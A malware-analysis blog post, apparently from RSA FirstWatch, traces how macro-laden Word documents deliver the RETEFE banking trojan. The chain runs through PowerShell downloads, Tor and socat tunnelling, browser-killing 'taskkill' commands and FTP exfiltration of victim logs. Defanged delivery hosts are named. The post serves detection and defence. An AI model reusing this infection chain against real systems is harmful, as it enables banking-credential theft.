During the first week of October 2017, RSA FirstWatch identified a Malspam campaign targeting Swiss industry with malicious MS Word documents carrying the RETEFE Banking Trojan.
Much of Europe has been routinely targeted by these actors for the last several months, and there is little sign of the RETEFE campaign letting up, as evident in numerous VirusTotal submissions of recent dropper documents:
These dropper hashes are all German language MS Word docs with varying properties are essentially the same W97M/Downloader, where malicious code is located in identical VBA macros. And upon submitting one of the MS Word delivery document to RSA's pre-release WhatsThisFile service, we are immediately greeted with a threat score of 100. (Note: The underlying VBA code streams in each of these Office documents are identical. The malware author attempted to avoid detection by changing file properties (e.g., Author) on each of the documents. This resulted in unique file hashes for each document, but, the resulting codeset remained the same).
Below are snapshots from our Cuckoo detonation (of one of the dropper documents) and the corresponding network traffic as seen by RSA NetWitness, both of which we'll walk through to show how the malicious code delivers a successful RETEFE infection. (Note: the entire PCAP from our sandbox is available at GitHub - netwitness/retefe: retefe banking trojan.)
As the document is first opened, embedded VBA code is automatically run via a Document_Open()subroutine contained in the ThisDocument VBA Stream as shown below.
The Document_Open() subroutine begins a long series of de-obfuscation steps which ultimately yields a base-64 encoded payload as shown below.
This payload is base-64 decoded in order to obtain the second stage of the dropper attack as shown pasted below.
This stage of the attack utilizes PowerShell to launch a hidden window, which attempts to download malware from each of 5 sites specified in the payload. This payload is launched via the VBA.Shell() command in the f9TZtz1 VBA code stream as shown in the following two WTF screen shots.
NetWitness Endpoint (as shown in the steps and annotated in the graphic below) easily follows this behavior.
1. This begins the launching of the doc file from Internet Explorer which calls Microsoft Word.
2. Once ‘Enable Content’ is clicked, WINWORD.exe calls powershell to retrieve content from a few different websites and save as 65536.exe.
3. Powershell creates a process with the downloaded content as 65536.exe
5. Next wscript is writing a ps1 (powershell) script.
6. Wscript then calls powershell to launch the newly created VHSjWECxz.ps1 file. We also see powershell writing the 7za.exe file.
NetWitness Packets observes the first four download attempts fail (via 404) and catches the successful download of 'wluheol.exe', the actual RETEFE payload, from thomasamericalatina[.]net hosted at 190.0.230[.]91, under a Costa Rican based domain name and web-hosting service, Cyberfuel[.]com.
Below is a Maltego snapshot of the numerous attempted (failed and successful) RETEFE delivery domains with some basic passive DNS enrichment.
Decodes to this fun registry key:
Here are some other strings that are base64 encoded in the payload:
taskkill /F /im firefox.exe
taskkill /F /im chrome.exe
The largest of all base64 payloads is in the last sequenced file in the zip (js-decoded-4.js), which contains the base64 decoded blob found in stage 3 (js-decoded-3.js). It is also ripe with artifacts, but is too big to paste here. A zip (password 'infected') of all the decoded payloads has been posted to FirstWatch's public github repo at GitHub - netwitness/retefe: retefe banking trojan.
During the execution of the malware (as described above), we begin to see some known characteristics and behaviors associated with RETEFE. The download of Tor and socat are our first keys.
Tor with socat (acting as a proxy) is quickly put to use as the malware establishes command and control (c2) via a number of tor relays, as observed in the highlighted traffic below over ports 9001 and 443.
Again NetWitness Endpoint demonstrates its utility here (as annotated in the steps and graphic below).
8. Powershell is called upon again which launches cmd.exe. This time, it runs bitsadmin to download the TOR client.
9. EXE is called upon to extract the downloaded TOR content into the "C:\Users\analyst\AppData\Roaming\Identities" directory.
10. Next, mshta.exe is called to launch the TOR process.
11. We next see 7za.exe extracting more content into the “Identities” directory after another powershell script was run.
12. Here, we can see the malicious code launch ‘socat.exe’ and started a SOCKS tunnel to a TOR node on ports 5555 and 5588. It also stopped any running Chrome, Firefox or Internet Explorer browsers.
In addition the the Tor connections, the malware also employs an alternative exfiltration method via FTP to a server hosted on world4you[.]com. SALES05.log is the exfiltrated file, whose name is based on the infected machine, in this case ‘SALES05’.
This exfiltration is done via the J/S payload in the Zip file at the end of ‘wluheol.exe', where there are several lines of code in the last J/S file that provide some insight into exactly what's being exfiltrated in this log file.
It is believed that the actors are/were leveraging the below compromised site to access this FTP exfiltration.
As the infection persists over the course of many hours, we also observed heavy periodic beaconing in NetWitness Packets.
Thanks to Christopher Ahearn, Kent Backman, firstname.lastname@example.org, and Ahmed Sonbol for their contributions to this research. All related Indicators of Compromise (IOCs) have been added to the FirstWatch C2 Domain and C2 IPs feeds and are available in RSA Live.
RETEFE Delivery domains:
RETEFE Payload hash:
RETEFE C2 domains (Tor relays):
Alternative exfil domain: